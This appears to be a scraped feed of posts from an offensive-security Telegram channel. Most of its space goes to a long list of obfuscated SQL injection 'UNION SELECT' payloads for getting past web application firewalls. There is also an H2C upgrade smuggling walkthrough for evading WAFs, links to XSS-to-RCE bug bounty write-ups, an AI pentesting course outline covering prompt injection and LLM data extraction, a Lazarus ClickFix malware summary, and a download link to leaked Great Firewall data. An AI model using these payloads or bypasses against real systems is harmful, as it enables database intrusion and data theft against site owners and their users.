Jason Haddix’s Article about HACKBOTS
https://executiveoffense.beehiiv.com/p/ai-hackbots-part-1
⭐️ @ZeroSec_team
https://executiveoffense.beehiiv.com/p/ai-hackbots-part-1
⭐️ @ZeroSec_team
Executive Offense
🔴 Executive Offense - Building AI Hackbots, Part 1
🔥4❤1
Bypass SQL union select
#Bypass #SQL
⭐️ @ZeroSec_team
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
⭐️ @ZeroSec_team
🔥2❤1👍1👎1
Defender for Identity
(formerly known as Azure Advanced Threat Protection or AATP) is a Microsoft cloud security service that focuses on Active Directory (AD) and Azure AD. Its main purpose is to detect threats, attacks, and lateral movements within the network
⭐️ @ZeroSec_team
(formerly known as Azure Advanced Threat Protection or AATP) is a Microsoft cloud security service that focuses on Active Directory (AD) and Azure AD. Its main purpose is to detect threats, attacks, and lateral movements within the network
⭐️ @ZeroSec_team
❤4
RadvanSec
Defender for Identity (formerly known as Azure Advanced Threat Protection or AATP) is a Microsoft cloud security service that focuses on Active Directory (AD) and Azure AD. Its main purpose is to detect threats, attacks, and lateral movements within the network…
Microsoft Defender for Identity in Depth.pdf
51.2 MB
❤3
🚨 XSS in Google IDX Workstation → RCE! $22,500 Bounty Earned 💰
Author: Aditya Sunny
Follow on LinkedIn: @adityasunny06
Program: Google VRP
Status: Accepted & Fixed ✅
Reward: $22,500 💸
https://infosecwriteups.com/xss-in-google-idx-workstation-rce-22-500-bounty-earned-2d09f0176869?gi=c80bc4672c8b
⭐️ @ZeroSec_team
Author: Aditya Sunny
Follow on LinkedIn: @adityasunny06
Program: Google VRP
Status: Accepted & Fixed ✅
Reward: $22,500 💸
https://infosecwriteups.com/xss-in-google-idx-workstation-rce-22-500-bounty-earned-2d09f0176869?gi=c80bc4672c8b
⭐️ @ZeroSec_team
Medium
🚨 XSS in Google IDX Workstation → RCE! $22,500 Bounty Earned 💰
Author: Aditya Sunny Follow on LinkedIn: @adityasunny06 Program: Google VRP Status: Accepted & Fixed ✅ Reward: $22,500 💸
🔥4❤1
From Blind XSS to RCE: When Headers Became My Terminal
https://is4curity.medium.com/from-blind-xss-to-rce-when-headers-became-my-terminal-d137d2c808a3
⭐️ @Zerosec_team
https://is4curity.medium.com/from-blind-xss-to-rce-when-headers-became-my-terminal-d137d2c808a3
⭐️ @Zerosec_team
🔥3❤2👏1
Forwarded from Hacking Articles
🚀 AI Penetration Training (Online) – Register Now! 🚀
🔗 Register here: https://forms.gle/bowpX9TGEs41GDG99
💬 WhatsApp: https://wa.me/message/HIOPPNENLOX6F1
📧 Email: info@ignitetechnologies.in
Limited slots available! Hurry up to secure your spot in this exclusive training program offered by Ignite Technologies.
🧠 LLM Architecture
🔐 LLM Security Principles
🗄 Data Security in AI Systems
🛡 Model Security
🏗 Infrastructure Security
📜 OWASP Top 10 for LLMs
⚙️ LLM Installation and Deployment
📡 Model Context Protocol (MCP)
🚀 Publishing Your Model Using Ollama
🔍 Introduction to Retrieval-Augmented Generation (RAG)
🌐 Making Your AI Application Public
📊 Types of Enumeration Using AI
🎯 Prompt Injection Attacks
🐞 Exploiting LLM APIs: Real-World Bug Scenarios
🔑 Password Leakage via AI Models
🎭 Indirect Prompt Injection Techniques
⚠️ Misconfigurations in LLM Deployments
👑 Exploitation of LLM APIs with Excessive Privileges
📝 Content Manipulation in LLM Outputs
📤 Data Extraction Attacks on LLMs
🔒 Securing AI Systems
🧾 System Prompts and Their Security Implications
🤖 Automated Penetration Testing with AI
🔗 Register here: https://forms.gle/bowpX9TGEs41GDG99
💬 WhatsApp: https://wa.me/message/HIOPPNENLOX6F1
📧 Email: info@ignitetechnologies.in
Limited slots available! Hurry up to secure your spot in this exclusive training program offered by Ignite Technologies.
🧠 LLM Architecture
🔐 LLM Security Principles
🗄 Data Security in AI Systems
🛡 Model Security
🏗 Infrastructure Security
📜 OWASP Top 10 for LLMs
⚙️ LLM Installation and Deployment
📡 Model Context Protocol (MCP)
🚀 Publishing Your Model Using Ollama
🔍 Introduction to Retrieval-Augmented Generation (RAG)
🌐 Making Your AI Application Public
📊 Types of Enumeration Using AI
🎯 Prompt Injection Attacks
🐞 Exploiting LLM APIs: Real-World Bug Scenarios
🔑 Password Leakage via AI Models
🎭 Indirect Prompt Injection Techniques
⚠️ Misconfigurations in LLM Deployments
👑 Exploitation of LLM APIs with Excessive Privileges
📝 Content Manipulation in LLM Outputs
📤 Data Extraction Attacks on LLMs
🔒 Securing AI Systems
🧾 System Prompts and Their Security Implications
🤖 Automated Penetration Testing with AI
❤6👍1
The Lazarus Group (APT), which is widely known to be linked to North Korea, has recently launched a new social engineering technique called ClickFix. In this method, the attacker fabricates a fake problem (for example, claiming that your camera is broken or that you need to install an update) and tricks the victim into clicking a link or executing a command that actually runs malicious code. Lazarus has been primarily using this technique in fake job interview scenarios within the cryptocurrency sector, which is why their new campaign is known as ClickFake Interview.
In these attacks, they typically drop infected files such as ClickFix-1.bat or compressed packages like nvidiaRelease.zip in front of the victim. These files execute malware families such as BeaverTail and InvisibleFerret, designed to steal information and establish hidden access. Interestingly, Lazarus has built multiple variants of these malware strains — ranging from PowerShell and Node.js noscripts on Windows to Golang binaries that run across Windows, Linux, and even macOS (both ARM and Intel).
⭐️ @ZeroSec_team
In these attacks, they typically drop infected files such as ClickFix-1.bat or compressed packages like nvidiaRelease.zip in front of the victim. These files execute malware families such as BeaverTail and InvisibleFerret, designed to steal information and establish hidden access. Interestingly, Lazarus has built multiple variants of these malware strains — ranging from PowerShell and Node.js noscripts on Windows to Golang binaries that run across Windows, Linux, and even macOS (both ARM and Intel).
⭐️ @ZeroSec_team
❤1👌1
Reports show that the new wave of censorship has become much stricter. The focus now is on blocking commonly used ports like 443 and 80 when used for non-standard traffic, and even alternative ports such as 8443 and 2083 are under pressure. The use of DPI (Deep Packet Inspection) has increased significantly, with attempts to intelligently identify encrypted traffic.
In addition, serious changes have been applied to DNS, and a multi-layered blocking system is being implemented. This time it’s not just about IP blocking — more intelligent methods are being used to detect VPNs and tunneling. Many regular V2Ray or Xray configurations no longer work, making it necessary to switch to more advanced obfuscation methods such as Obfuscation, Reality, or XTLS.
Signs suggest that restrictions will expand even further, and may even target cloud services and artificial intelligence platforms. In short, the situation is more serious than before, and new methods will be needed to bypass it.
خبرها نشون میده موج جدید فیلترینگ خیلی جدیتر شده الان تمرکز روی بستن پورتهای پر استفاده مثل 443 و 80 برای ترافیک غیر استاندارد هست و حتی پورتهای جایگزین مثل 8443 و 2083 هم تحت فشار قرار گرفتن استفاده از DPI یا همون Deep Packet Inspection به شدت افزایش پیدا کرده و سعی میکنن باهوش ترافیک رمزگذاری شده رو شناسایی کنن علاوه بر این روی DNS هم تغییرات جدی اعمال شده و مسدودسازی چند لایه داره پیادهسازی میشه این بار فقط آیپی بستن نیست بلکه روشهای هوشمند برای تشخیص VPN و تونلینگ فعال شدن خیلی از کانفیگهای عادی V2Ray یا Xray دیگه کار نمیکنن و باید سراغ روشهای پنهانسازی پیشرفتهتر مثل Obfuscation یا Reality و XTLS رفت نشونهها حاکی از اینه که سختگیری قراره گستردهتر بشه و حتی ممکنه به سمت مسدود کردن سرویسهای ابری و هوش مصنوعی هم بره خلاصه اینکه اوضاع از قبل جدیتره و باید به فکر روشهای جدید برای دور زدنش بود.
⭐️ @ZeroSec_team
In addition, serious changes have been applied to DNS, and a multi-layered blocking system is being implemented. This time it’s not just about IP blocking — more intelligent methods are being used to detect VPNs and tunneling. Many regular V2Ray or Xray configurations no longer work, making it necessary to switch to more advanced obfuscation methods such as Obfuscation, Reality, or XTLS.
Signs suggest that restrictions will expand even further, and may even target cloud services and artificial intelligence platforms. In short, the situation is more serious than before, and new methods will be needed to bypass it.
خبرها نشون میده موج جدید فیلترینگ خیلی جدیتر شده الان تمرکز روی بستن پورتهای پر استفاده مثل 443 و 80 برای ترافیک غیر استاندارد هست و حتی پورتهای جایگزین مثل 8443 و 2083 هم تحت فشار قرار گرفتن استفاده از DPI یا همون Deep Packet Inspection به شدت افزایش پیدا کرده و سعی میکنن باهوش ترافیک رمزگذاری شده رو شناسایی کنن علاوه بر این روی DNS هم تغییرات جدی اعمال شده و مسدودسازی چند لایه داره پیادهسازی میشه این بار فقط آیپی بستن نیست بلکه روشهای هوشمند برای تشخیص VPN و تونلینگ فعال شدن خیلی از کانفیگهای عادی V2Ray یا Xray دیگه کار نمیکنن و باید سراغ روشهای پنهانسازی پیشرفتهتر مثل Obfuscation یا Reality و XTLS رفت نشونهها حاکی از اینه که سختگیری قراره گستردهتر بشه و حتی ممکنه به سمت مسدود کردن سرویسهای ابری و هوش مصنوعی هم بره خلاصه اینکه اوضاع از قبل جدیتره و باید به فکر روشهای جدید برای دور زدنش بود.
⭐️ @ZeroSec_team
😭6🤡1💔1
🪲 #H2C Upgrade Bypass
Target: Applications using HTTP/2 Cleartext (h2c) upgrades.
The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.
How to Test:
1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).
2. Send an initial HTTP/1.1 request with the upgrade header:
3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2.
4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls.
Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection.
#BugBounty #Hacking #WebSecurity #WAFBypass #HTTP2
⭐️ @Zerosec_team
Target: Applications using HTTP/2 Cleartext (h2c) upgrades.
The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.
How to Test:
1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).
2. Send an initial HTTP/1.1 request with the upgrade header:
GET / HTTP/1.1
Host: example.com
Upgrade: h2c
Connection: Upgrade
3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2.
4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls.
Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection.
#BugBounty #Hacking #WebSecurity #WAFBypass #HTTP2
⭐️ @Zerosec_team
❤4
Check your burp isn't this feature is enable?
Most of hackers miss this thing. So, this is a great opportunity to make bounty using this burp feature.
#burp
#bugbounty
⭐️ @Zerosec_team
Most of hackers miss this thing. So, this is a great opportunity to make bounty using this burp feature.
#burp
#bugbounty
⭐️ @Zerosec_team
❤4🔥2
Pentesting Plugin Ecosystems: Advanced Exploitation Guide
https://www.intigriti.com/researchers/blog/hacking-tools/pentesting-addon-plugin-ecosystems
⭐️ @Zerosec_team
https://www.intigriti.com/researchers/blog/hacking-tools/pentesting-addon-plugin-ecosystems
⭐️ @Zerosec_team
❤3
The Great Firewall of China (GFW) has leaked
Good morning — around 600 GB of data has leaked. The ones to blame are Geedge Networks and the MESA Laboratory at the Institute of Information Engineering, Chinese Academy of Sciences.
These same guys, grinning slyly (like Shang Tsung), supply censorship technologies to Myanmar, Pakistan, Ethiopia, Kazakhstan, etc. (look up the “One Belt, One Road” initiative).
What leaked:
Source code, internal communication structures, work logs, technical documentation from groups involved in building and maintaining the system, plus a pile of project denoscriptions and technical proposals, and so on.
In general, if you start googling/reading about MESA and Geedge, it gets insanely interesting — not only how censorship was imposed inside China, but also how they exported it abroad for surveillance. Clever stuff.
Download :
https://cloud.proxy-bar.org/s/bOicFtWWj875DZi
⭐️ @ZeroSec_team
Good morning — around 600 GB of data has leaked. The ones to blame are Geedge Networks and the MESA Laboratory at the Institute of Information Engineering, Chinese Academy of Sciences.
These same guys, grinning slyly (like Shang Tsung), supply censorship technologies to Myanmar, Pakistan, Ethiopia, Kazakhstan, etc. (look up the “One Belt, One Road” initiative).
What leaked:
Source code, internal communication structures, work logs, technical documentation from groups involved in building and maintaining the system, plus a pile of project denoscriptions and technical proposals, and so on.
In general, if you start googling/reading about MESA and Geedge, it gets insanely interesting — not only how censorship was imposed inside China, but also how they exported it abroad for surveillance. Clever stuff.
Download :
https://cloud.proxy-bar.org/s/bOicFtWWj875DZi
⭐️ @ZeroSec_team
🔥4❤1